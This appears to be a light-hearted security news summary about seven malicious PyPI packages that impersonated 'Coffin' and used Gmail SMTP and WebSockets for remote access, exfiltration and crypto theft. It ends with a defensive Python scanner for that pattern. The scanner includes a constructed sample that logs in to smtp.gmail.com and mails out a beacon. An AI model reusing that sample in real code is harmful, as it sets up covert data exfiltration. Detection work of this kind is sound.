PyPI’s Malicious Package Fiasco: Coffin Conmen Strike Again!
Seven malicious PyPI packages were caught red-handed using Gmail’s SMTP servers for data exfiltration, with one notorious package downloaded over 18,000 times before being removed. These ‘Coffin’ packages impersonated a legitimate package but instead offered covert remote access and cryptocurrency theft. If installed, remove them pronto and rotate your keys!

Hot Take:
Who knew that PyPI packages could moonlight as cryptographic cat burglars? It seems that even the most innocuous-sounding code libraries have a knack for pulling off a digital heist. But hey, when Gmail’s SMTP server is your partner in crime, who needs a ski mask?
Key Points:
– Seven malicious PyPI packages were discovered using Gmail’s SMTP servers and WebSockets for nefarious deeds.
– These packages lingered on PyPI for up to four years, with one being downloaded over 18,000 times.
– The packages impersonated a legitimate ‘Coffin’ package, aiming at covert remote access and data exfiltration.
– The malware’s antics included email exfiltration, file transfer, and potential cryptocurrency theft.
– A related npm package, ‘crypto-encrypt-ts,’ also targeted cryptocurrency wallets, proving digital pickpocketing is in vogue.
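A defender-side check for the pattern in the key points above (a package that logs in to Gmail’s SMTP server with hard-coded credentials and imports a WebSocket library), written as an added example for this page rather than code from the reported packages. The sample source is constructed; the module names it imports and the indicator strings are assumptions, and the same `scan_source` can be mapped over every `.py` file in a site-packages directory.

```python
import ast

GMAIL_SMTP_HOST = "smtp.gmail.com"
SUSPECT_MODULES = ("smtplib", "websocket", "websockets")

def _call_name(func):
    # Name of the callee for both foo() and obj.foo()
    if isinstance(func, ast.Attribute):
        return func.attr
    return func.id if isinstance(func, ast.Name) else None

class _ExfilVisitor(ast.NodeVisitor):
    """Collects indicators of the Gmail-SMTP / WebSocket exfiltration pattern."""
    def __init__(self):
        self.findings = []

    def visit_Import(self, node):  # 'from smtplib import SMTP' is caught by visit_Call
        for alias in node.names:
            if alias.name.split(".")[0] in SUSPECT_MODULES:
                self.findings.append(f"line {node.lineno}: imports {alias.name}")

    def visit_Call(self, node):
        name = _call_name(node.func)
        # smtplib.SMTP("smtp.gmail.com", 587) or SMTP_SSL("smtp.gmail.com")
        if name in ("SMTP", "SMTP_SSL") and node.args:
            host = node.args[0]
            if isinstance(host, ast.Constant) and GMAIL_SMTP_HOST in str(host.value):
                self.findings.append(f"line {node.lineno}: {name}() connects to {host.value}")
        # conn.login("user", "pass") with both credentials as string literals
        if name == "login" and len(node.args) >= 2 and all(
                isinstance(a, ast.Constant) for a in node.args[:2]):
            self.findings.append(f"line {node.lineno}: login() with hard-coded credentials")
        self.generic_visit(node)

def scan_source(src):
    """Return indicator strings found in one Python source text."""
    visitor = _ExfilVisitor()
    visitor.visit(ast.parse(src))
    return visitor.findings

# Constructed sample mimicking the reported pattern; not code from the real packages.
SAMPLE = '''import smtplib, websocket
def setup():
    s = smtplib.SMTP("smtp.gmail.com", 587)
    s.login("mailbox@gmail.com", "app-password")
    s.sendmail("mailbox@gmail.com", "mailbox@gmail.com", "beacon")
'''
```

A hit on a package you did not expect to send mail is a reason to read that module before trusting it, not proof of malice on its own.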